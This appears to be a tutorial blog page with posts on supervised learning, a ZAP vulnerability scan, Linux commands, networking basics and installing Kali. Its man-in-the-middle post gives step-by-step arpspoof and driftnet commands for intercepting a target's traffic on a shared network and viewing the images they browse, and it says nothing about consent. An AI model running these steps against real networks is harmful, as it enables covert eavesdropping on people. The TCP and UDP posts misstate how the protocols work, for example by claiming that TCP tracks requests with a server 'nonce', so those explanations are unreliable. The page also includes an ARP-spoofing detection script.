Supervised Learning

[Image: supervised learning]

In this post, we will discuss the most commonly used technique in Machine Learning – Supervised Learning. From the above image, most of you might have got an idea of what Supervised Learning is. In Supervised Learning, the computer is taught to identify the pattern in the data to be processed. In short, we are teaching the computer to identify the pattern. The formal definition of Supervised Learning according to Wikipedia is:

Supervised learning is the machine learning task of learning a function that maps an input to an output based on example input-output pairs.

Basically, we are training the computer with inputs and outputs. Over time, the computer will start to find the pattern that defines the output based on the input. This is known as the learning function, which can then be used to predict the output for new inputs.

Let's look at some examples to understand supervised learning.

House Price prediction

Let's predict the price of a house based on its area in square feet. Honestly, I don't have any idea about the price of the house. Let's assume the data is relevant.

The graph shows the relation between the area of the house and the price. Let's assume that you are interested in buying a 750 square feet house. From the image it is clear that the house costs around 220K. But say you have changed your mind and want to buy a house of 1750 square feet. To derive the price, you draw the blue line that represents the relation between the area and the price. From the image it is clear that the cost is around 500K. This is similar to supervised learning.

The program is given the area as input and the price as labelled output for learning. The program derives a function (the blue line) that can be used to predict the price for a new area given as input. Here the blue line represents a linear function. But you can see that the yellow curve follows the points in the image more closely, so it is more accurate to predict the values using the yellow curve as reference. This is a quadratic function.

For your information, the price of the house is a continuous value, even though we round the price to the nearest 10s or 100s. So we consider this as a regression example.
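The blue line and the yellow curve can both be learned from the same labelled pairs. The following is an added example, not code from the original post: it fits a linear and a quadratic function by least squares and compares them. The training data is constructed for illustration (areas in thousands of square feet, prices in thousands), and all function names are made up for this example.

```python
def polyfit(xs, ys, degree):
    """Least-squares polynomial fit; returns coefficients [c0, c1, ...]."""
    n = degree + 1
    # Normal equations A c = b: A[i][j] = sum(x^(i+j)), b[i] = sum(y * x^i)
    A = [[sum(x ** (i + j) for x in xs) for j in range(n)] for i in range(n)]
    b = [sum(y * x ** i for x, y in zip(xs, ys)) for i in range(n)]
    # Solve by Gaussian elimination with partial pivoting
    for col in range(n):
        pivot = max(range(col, n), key=lambda r: abs(A[r][col]))
        A[col], A[pivot] = A[pivot], A[col]
        b[col], b[pivot] = b[pivot], b[col]
        for r in range(col + 1, n):
            f = A[r][col] / A[col][col]
            for c in range(col, n):
                A[r][c] -= f * A[col][c]
            b[r] -= f * b[col]
    coeffs = [0.0] * n
    for i in reversed(range(n)):
        tail = sum(A[i][j] * coeffs[j] for j in range(i + 1, n))
        coeffs[i] = (b[i] - tail) / A[i][i]
    return coeffs


def predict(coeffs, x):
    """Evaluate the learned function at x."""
    return sum(c * x ** i for i, c in enumerate(coeffs))


def sse(coeffs, xs, ys):
    """Sum of squared errors of the learned function on the training data."""
    return sum((predict(coeffs, x) - y) ** 2 for x, y in zip(xs, ys))


# Constructed training data (not from the post): area in thousands of square
# feet as input, price in thousands as the labelled output.
AREAS = [0.5, 0.75, 1.0, 1.25, 1.5]
PRICES = [150.0, 212.5, 280.0, 352.5, 430.0]

LINE = polyfit(AREAS, PRICES, 1)    # the "blue line"
CURVE = polyfit(AREAS, PRICES, 2)   # the "yellow curve"

if __name__ == "__main__":
    for name, model in (("linear", LINE), ("quadratic", CURVE)):
        print(name, "price for 1750 sq ft:", round(predict(model, 1.75), 2),
              "training error:", round(sse(model, AREAS, PRICES), 2))
```

On this data the line has a non-zero training error while the quadratic passes through every point, so the two functions give different prices for the 1750 square feet house.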

Cancer Prediction

Now let's predict whether a tumor is cancerous or not based on the size of the tumor. The image shows the relation between the size of the tumor and whether it is cancerous or not. 0 represents non-cancerous tumors and 1 represents cancerous tumors.

All the non-cancerous tumors are represented as blue dots and the cancerous tumors as red crosses. Now let's assume that the green dot represents a tumor. We have to find whether it is a cancerous or non-cancerous tumor. It's clear from the image that it is a non-cancerous tumor.

Here, the main purpose of the example is to classify whether the tumor is cancerous or not based on its size. This is an example of a classification problem. Here 0 and 1 are the labels for the classification problem. A classification problem can have multiple labels. The input for the program is the size of the tumor, and the labelled output is whether it is cancerous or not. The program should find an optimal value for the size of the tumor, which can be used as the reference for classifying new inputs.
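Finding that "optimal value" can be done by trying every cut point between neighbouring training sizes and keeping the one with the fewest misclassified samples. This is an added example, not code from the original post; the sizes (assumed to be in cm), the labels and the function names are constructed for illustration.

```python
# Constructed training data: (tumor size in cm, label);
# 0 = non-cancerous, 1 = cancerous. One large benign sample (4.2) is
# included so that no threshold can be perfect.
SAMPLES = [(1.0, 0), (1.5, 0), (2.0, 0), (2.5, 0), (4.2, 0),
           (3.0, 1), (3.5, 1), (4.0, 1), (4.5, 1), (5.0, 1)]


def classify(size, threshold):
    """Predict the label for a new tumor size."""
    return 1 if size >= threshold else 0


def errors(samples, threshold):
    """Number of training samples the threshold gets wrong."""
    return sum(classify(size, threshold) != label for size, label in samples)


def learn_threshold(samples):
    """Try the midpoint between each pair of neighbouring sizes and keep
    the one with the fewest training errors."""
    sizes = sorted({size for size, _ in samples})
    candidates = [(a + b) / 2 for a, b in zip(sizes, sizes[1:])]
    return min(candidates, key=lambda t: errors(samples, t))


THRESHOLD = learn_threshold(SAMPLES)

if __name__ == "__main__":
    print("learned threshold:", THRESHOLD)
    print("training errors:", errors(SAMPLES, THRESHOLD))
    for new_size in (2.0, 3.8):
        print(new_size, "->", classify(new_size, THRESHOLD))
```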

Hope that you understood the supervised learning technique in Machine Learning. In the next post, we will discuss Unsupervised Learning. Feel free to comment on the post.

Previous : Machine Learning – Introduction

Posted by Joyal Baby in ML and AI, 0 comments
Vulnerability scanning for a web application (Odoo) using Zed Attack Proxy (ZAP)

Today we are going to see how to test a web application using OWASP ZAP. It is one of the best scanners that you can find on the internet, and it is an open-source project, so you can modify the application to suit your needs. One advantage of using ZAP over Vega (a vulnerability scanning tool) is that you can generate a report for the testing that you have done. Check out the OWASP Top 10 vulnerabilities at the following link:

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 

In this tutorial I will be using Kali Linux, which comes with the ZAP tool pre-installed.

If you are using any other Linux operating system, the download link is below:

https://github.com/zaproxy/zaproxy/wiki/Downloads

Download the zip folder and extract.

Now open your terminal and navigate to the folder where you extracted it.

Run the zap.sh file using the following command:

./zap.sh

In Kali Linux, search for the word "zed" and open the application.

Step 1: Select the configuration for your ZAP application. I am selecting the default option and clicking "Start".

Step 2: Now let's generate the CA certificate so that the browser can route its requests and responses through ZAP (as a proxy).

  • Go to Tools -> Options

Step 3: Select the sub-menu named "Dynamic SSL Certificates" from the options menu.

Then click Generate to generate your own SSL certificate, and save the certificate on your PC.

Step 4: Let's open the browser (I am using Firefox) and configure it to use ZAP.

  • Settings -> Preferences

Type "Network proxy" in the search box, run the search, and go to Settings.

Step 5: Select "Manual proxy configuration".

  • HTTP Proxy: 127.0.0.1
  • Port: 8080
  • Select and activate the "Use this proxy server for all protocols" option.
  • Under "No Proxy for", delete addresses such as 127.0.0.1 and localhost, if you have any.
  • Save the configuration.

Step 6: Enter the IP address that you want to scan.

I am running the Odoo web application, which is running on the IP address 192.168.0.103:8069.

Now let's explore the application so that ZAP can capture it. Exploring manually (manual spidering) helps ZAP crawl the site without leaving any page behind.

As we explore the application, ZAP captures the requests; you can see the sites, marked with a flag, under the "Sites" menu.

Step 7: Now let's start the scan by right-clicking the IP address under the Sites menu.

  • Attack -> Active Scan

Step 8: Select the node, or change to the module you want to scan. I will be scanning the entire site by selecting the IP address.

You can see the requests and response codes in the bottom section of the ZAP tool. The progress bar shows the progress of the scan.

Click the (+) tab and select the Alerts menu (which categorizes the vulnerabilities of the application).

Step 9: Once the scan is complete, you can see the vulnerabilities found in the web application.

The Alerts section will help you find the vulnerabilities.

Step 10: To save the scan results, go to the Report menu at the top

and select the "Generate HTML report" menu item to generate the report for further use.

The generated report holds a detailed description of each vulnerability, along with its priority and severity.

Thank you guys for your support.
Posted by ashokkumar in Hacking basics, 0 comments

Machine Learning

Introduction

What is Machine Learning? There are many definitions of Machine Learning (ML) that are very common. In this post, we will have a quick look at what ML is and some of the applications of ML. Let’s take a look at one of the well-known definitions of ML, by Arthur Samuel – one of the pioneers in the field of Artificial Intelligence (AI).

“The field of study that gives the computers the ability to learn without being explicitly programmed.”

Back in the 1950’s, Arthur Samuel wrote a checkers-playing program that played 10’s or 1000’s of games against itself. Eventually it learned the good and bad board positions and evolved to be a better checkers player than Arthur Samuel himself. This was a remarkable result. It happened because the program gained more checkers-playing experience from the 1000’s of games, and got better and better.

Here is a rather newer definition of ML by Tom Mitchell – an American computer scientist.

“A computer program is said to learn from experience E with respect to some task T and some performance measure P, if its performance on T, as measured by P improves with experience E.”

What it really means is that if a program can improve its performance on a given task using the experience it has previously gained, then it is known as ML. Taking the checkers game, T is the task of playing checkers, E is the experience from the 1000’s of games and P is the chance of winning the game.

Machine Learning Algorithms

The ML algorithms are mainly classified into two –

  • Supervised Learning
  • Unsupervised Learning

We will look at these types in detail in the upcoming posts. In short, Supervised Learning is the one in which we teach the computer to learn, and in Unsupervised Learning the computer learns by itself. You might have even heard other terms such as Reinforced Learning and Recommender systems; those are also types of ML algorithms.

Applications of ML

There are many fields of application for ML. Some of them are –

  • Spam email filtering used by Google, Yahoo, Outlook etc.
  • Recommender systems used by online shopping sites like Amazon, Flipkart etc.
  • Stock market prediction.
  • Autonomous weapons.

There are many more applications of ML; these are just some of them. In the next post, I will be explaining more about the Supervised Learning algorithms.

Next : Supervised Learning

Posted by Joyal Baby in ML and AI, 0 comments

Useful Commands For Linux Users

  • cd — Changes the current terminal directory.
  • clear — Clears the terminal screen.
  • history — Displays a list of all recently used commands.
  • ls — Displays a list of all files in the current terminal directory.
  • man — Displays a help page (from the manual) based on your search query.
  • pwd — Displays the current terminal directory as an absolute path.
  • chmod/chown — The chmod command changes the read, write, and execute permissions of a file while the chown command changes the user and/or user group that owns a file.
  • cp — Makes a copy of a file.
  • find — Searches a specific directory (or your entire system) to find files that match a given set of criteria.
  • grep — Searches a specific file or set of files to see if a given string of text exists, and if it does, tells you where the text exists in those files.
  • locate — Searches the entire system for files or directories that match the search query, then outputs the absolute paths for each match.
  • mkdir/rmdir — Creates or deletes a directory, by default in the current terminal directory but a target directory can be specified as well. When deleting, the directory must be completely empty.
  • mv — Moves a file from one directory to another, and you can specify a different name for the file in the target directory.
  • nano/emacs/vim — The three main terminal text editors that exist on nearly all Linux systems, ordered by increasing complexity.
  • rename — Changes the name of a file or a set of files. Comes with a lot of interesting parameters, allowing you to automatically rename a bunch of files according to a pattern.
  • rm — Removes files. With a certain parameter, it can be used to wipe the entire contents of a specified directory. It can also be used to delete several files that all match a certain filename pattern.
  • touch — Changes the date accessed or date modified of the given file to right now.
  • wget — Downloads the file or page at the given web URL.
  • zip/gzip/tar — Various formats for compressing and decompressing file archives.
Posted by ashokkumar in Hacking basics, 0 comments

MITM attack

Hello guys, today let's see how to perform a simple man-in-the-middle attack using the Kali Linux operating system.

First, let's understand: what is a MITM attack?

A man-in-the-middle attack is nothing but an unauthorized person eavesdropping on a conversation between two nodes.

Commands used in the MITM attack

sysctl -w net.ipv4.ip_forward=1
arpspoof -i <network_interface> -t <target ip>  <router ip>
arpspoof -i <network_interface> -t <router ip>  <target ip>
driftnet -i <network_interface>
sysctl -w net.ipv4.ip_forward=0

Let's start the simple MITM attack.

Open your Kali Linux operating system, navigate to the terminal, and identify the following information:

  • Your target IP address: 192.168.0.104
  • Your router gateway address: 192.168.0.1
  • Your network interface: wlan0

[Note]: To perform this attack, you and your target must be connected to the same network.

First Step:

sysctl -w net.ipv4.ip_forward=1

This command enables IP forwarding, which is needed to start the MITM attack.

Second Step:

Here we make the Kali Linux machine intercept the communication between the router and the target.

arpspoof -i <network_interface> -t <target ip>  <router ip>

Example

arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1

Third Step:

Continuation of the interception process

arpspoof -i <network_interface> -t <router ip>  <target ip>

Example

arpspoof -i wlan0 -t 192.168.0.1 192.168.0.104

Fourth Step:

Let's start the driftnet tool to intercept the images that are being browsed in the target's web browser.

driftnet -i <network_interface>

Example

driftnet -i wlan0

After this command, the driftnet GUI window will open and you can see the images being intercepted.

Fifth Step:

After this process, most importantly, disable IP forwarding again.

sysctl -w net.ipv4.ip_forward=0
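While the arpspoof commands above are running, the target's ARP table lists the router's IP address with the MAC address of the intercepting machine, which is what a defender can look for. The following is an added example, not part of the original post: it parses text in the Linux /proc/net/arp format and reports a gateway whose MAC is shared with another host or differs from a recorded value. The sample table, the MAC addresses, the 192.168.0.105 address and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample in /proc/net/arp format, as it might look on the target
# while its gateway entry is being spoofed. All MAC addresses are made up.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         02:00:00:aa:bb:05     *        wlan0
192.168.0.105    0x1         0x2         02:00:00:aa:bb:05     *        wlan0
192.168.0.110    0x1         0x2         02:00:00:cc:dd:10     *        wlan0
192.168.0.120    0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

def parse_arp_table(text):
    """Return {ip: mac} for completed entries; skips the header row."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hw_type, flags, mac = fields[:4]
        if int(flags, 16) & 0x2 == 0:
            continue  # 0x2 = ATF_COM; unresolved entries carry no real MAC
        entries[ip] = mac.lower()
    return entries

def shared_macs(entries):
    """MAC addresses that more than one IP address resolves to."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(entries, gateway_ip, known_gateway_mac=None):
    """Return a list of findings about the gateway's ARP entry."""
    mac = entries.get(gateway_ip)
    if mac is None:
        return ["gateway has no completed ARP entry"]
    findings = []
    if known_gateway_mac and mac != known_gateway_mac.lower():
        findings.append(
            f"gateway MAC changed: expected {known_gateway_mac.lower()}, saw {mac}")
    others = [ip for ip in shared_macs(entries).get(mac, []) if ip != gateway_ip]
    if others:
        findings.append(f"gateway MAC {mac} also claimed by {', '.join(others)}")
    return findings

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for finding in check_gateway(table, "192.168.0.1", "02:00:00:11:22:01"):
        print("ALERT:", finding)
```

Several IP addresses can legitimately share one MAC (a multi-homed host or proxy ARP, for example), so the comparison against a recorded gateway MAC is the stronger of the two checks.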

 

 

Posted by ashokkumar in Hacking basics, 0 comments

What is IP Protocol?

Internet Protocol - IP

IP stands for Internet Protocol. It is pronounced as separate letters. The IP protocol is used to communicate between two or more systems in a network. It assigns a unique address to each system in a network, which helps in identifying the systems and enables communication between them.

Types of IP address

  • IPv4 address
  • IPv6 address

Examples of IPv4 and IPv6 addresses

  • IPv4 address: 192.168.0.1
  • IPv6 address: 2001:cdba:0000:0000:0000:0000:3257:9652

Why is there an IPv4 and IPv6 classification?

IPv4 addressing is the old way of addressing, where the number of systems is limited to 4,294,967,296 (32 bits, 2^32) addresses in a network.

With the rapid growth of technology, the number of systems in a network also increased, so there is demand for more addresses. We therefore adopted a new addressing system, IPv6, which can provide 340,282,366,920,938,463,463,374,607,431,768,211,456 (128 bits, 2^128) addresses in a network.

Posted by ashokkumar in Networking, 0 comments

What is UDP Protocol

UDP - User Datagram Protocol

UDP is pronounced as separate letters. UDP is also a protocol, like TCP, used for communication between two systems. But UDP is undoubtedly different from TCP in its working mechanism.

User Datagram Protocol (UDP) communication is not reliable and secure, because UDP does not send an acknowledgement back to the server.

The best examples of UDP use are video streaming, VoIP calls and online gaming.

(E.g. when you visit YouTube and play a video, the YouTube server sends the packets continuously to your IP address without verifying whether you received the packets or whether they were lost during transmission.)

There is no handshaking process in UDP communication; thus UDP is a stateless protocol.
Posted by ashokkumar in Networking, 0 comments

What is TCP Protocol?

Transmission Control Protocol - TCP

TCP is pronounced as separate letters. TCP is one of the most important and widely used protocols of the Internet Protocol (IP) suite.

This protocol establishes a persistent connection between two systems (i.e. client and server).

Transmission Control Protocol (TCP) is a stateful protocol. For example, when a client sends a request to a server, as when you visit google.com (server) from your browser (client):

The server generates a number, called a nonce, for the request and stores it to remember the request.

Then google.com (the server) processes your request and sends the result to your web browser (client) with the help of the nonce.

This process happens at the macro/micro level within seconds. TCP follows a three-way handshake process.
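The difference between UDP's missing handshake and TCP's three-way handshake, as described in the two posts above, can be observed on the loopback interface. This is an added example, not code from the original posts: a UDP send "succeeds" even when nobody is listening, while a TCP connect fails unless a listener completes the handshake. The function names and payloads are made up for illustration.

```python
import socket


def free_port(kind):
    """Ask the OS for an unused loopback port, then release it again."""
    with socket.socket(socket.AF_INET, kind) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def udp_send_without_listener(payload=b"frame-1"):
    """UDP: sendto() returns once the datagram is handed to the kernel.
    Nothing tells the sender that no one received it."""
    port = free_port(socket.SOCK_DGRAM)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        return s.sendto(payload, ("127.0.0.1", port))  # bytes "sent"


def tcp_connect_without_listener():
    """TCP: connect() runs the three-way handshake and fails without a peer."""
    port = free_port(socket.SOCK_STREAM)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(2)
        try:
            s.connect(("127.0.0.1", port))
            return "connected"
        except ConnectionRefusedError:
            return "refused"


def tcp_send_with_listener(payload=b"hello"):
    """TCP with a listener: the handshake completes and the data arrives."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.bind(("127.0.0.1", 0))
        server.listen(1)
        with socket.create_connection(server.getsockname(), timeout=2) as client:
            conn, _peer = server.accept()
            with conn:
                client.sendall(payload)
                return conn.recv(len(payload))


if __name__ == "__main__":
    print("UDP, no listener:", udp_send_without_listener(), "bytes sent")
    print("TCP, no listener:", tcp_connect_without_listener())
    print("TCP, listener   :", tcp_send_with_listener())
```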
Posted by ashokkumar in Networking, 0 comments

[Solution] Install kali Linux (2018.2) on virtual Box (Windows 10)

Software required:

  • VirtualBox
  • Kali Linux operating system

Step 1:

The download links for the necessary software are provided below; please download them before proceeding. (Identify your system architecture and download the corresponding files. For example, I am using Windows 10, which is a 64-bit architecture.)

1. VirtualBox software

2. Kali Linux .iso file (Kali Linux amd64).

Step 2: Install the VirtualBox software that you downloaded.

It is a simple installation wizard: Next -> Next -> Finish.

Step 3: After successfully installing VirtualBox, let's configure it.

Configuring VirtualBox for Kali Linux OS

Step 4: Let's install Kali Linux OS on VirtualBox.

The steps are provided in the following slideshows.

Posted by ashokkumar in Hacking basics, 0 comments